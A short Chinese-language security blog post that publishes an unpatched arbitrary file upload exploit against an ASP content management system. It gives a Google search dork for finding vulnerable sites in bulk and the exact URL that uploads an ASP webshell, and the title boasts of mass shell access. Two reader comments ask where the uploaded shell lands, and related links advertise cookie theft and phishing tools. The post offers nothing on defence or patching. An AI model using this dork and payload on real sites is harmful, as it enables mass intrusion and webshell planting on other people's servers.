关注我们
QRcode 邮件联系 QRcode
主页 » 信息安全 » 正文

任意文件上传漏洞可批量拿shell

 feng  5,483 ℃  3条点评

今天呢,发布一个0day,是一个任意上传漏洞。

谷歌关键字:inurl:newslist.asp?NodeCode=
然后在域名后面添加admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

任意上传拿shell  

很吃香哦

出图测试
1111.jpg

本文标签:
阿里巴巴存在储存型xss漏洞可获得cookies
Cain嗅探的RDP包批量解析脚本导出用户名+密码
Joy:一款用于捕获和分析网络内部流量数据的工具Joy:一款用于捕获和分析网络内部流量数据的工具One-Lin3r:懒人的福音,渗透测试单行化工具One-Lin3r:懒人的福音,渗透测试单行化工具EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具国产网站恶意代码监测(网马监控)工具优化版国产网站恶意代码监测(网马监控)工具优化版

已有3条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

  1. #2 Sh1Ft2b

    请问怎么找马地址 我的博客

    2013-03-16 下午 4:11回复
  2. #1 阿樂

    上传成功后的文件地址是什么?

    2017-01-06 上午 4:35回复


注册帐号  |  忘记密码